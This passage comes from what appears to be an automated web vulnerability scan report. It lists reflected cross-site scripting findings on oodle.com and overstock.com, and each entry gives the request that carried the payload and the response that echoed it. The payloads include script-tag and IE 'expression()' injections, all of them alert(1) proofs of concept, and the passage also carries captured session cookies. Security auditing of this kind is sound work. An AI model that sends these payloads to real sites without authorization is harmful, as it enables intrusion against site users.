Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 18589
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lyExtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds prod4ae7"-alert(1)-"7616b8adb5d/register/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.253. http://www.oodle.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f11c"><script>alert(1)</script>b9d58303a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro1f11c"><script>alert(1)</script>b9d58303a91/register/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:25 GMT
Content-Length: 18681
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro1f11c"><script>alert(1)</script>b9d58303a91/register/" />
...[SNIP]...

1.254. http://www.oodle.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 356cd"-alert(1)-"b9eeacb18a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/register356cd"-alert(1)-"b9eeacb18a4/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:27 GMT
Content-Length: 12339
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA3O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
elds = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/register356cd"-alert(1)-"b9eeacb18a4/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.255. http://www.oodle.com/pro/register/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1776e"><script>alert(1)</script>c9260d89932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/register1776e"><script>alert(1)</script>c9260d89932/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 12398
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/register1776e"><script>alert(1)</script>c9260d89932/" />
...[SNIP]...

1.256. http://www.overstock.com/Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc878"style%3d"x%3aexpression(alert(1))"de327d4d908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc878"style="x:expression(alert(1))"de327d4d908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html?dc878"style%3d"x%3aexpression(alert(1))"de327d4d908=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:23:00 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:23:00 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5036238|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:23:00 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:23:00 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1290802980709; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="dc878"style="x:expression(alert(1))"de327d4d908" value="1"/>
...[SNIP]...

1.257. http://www.overstock.com/Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac39"style="x:expression(alert(1))"b1de9c0f865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html?5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:22:57 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:22:57 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1290802977172; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5036236|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:57 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="5ac39"style="x:expression(alert(1))"b1de9c0f865" value="1"/>
...[SNIP]...

1.258. http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd49a"style="x:expression(alert(1))"b5b8b6cc345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:22:58 GMT
Server: Apache
Expires: Fri, 26 Nov 2010 20:22:58 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4783826|; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101126; Domain=.overstock.com; Expires=Sat, 26-Nov-2011 20:22:58 GMT; Path=/
Set-Cookie: cinfo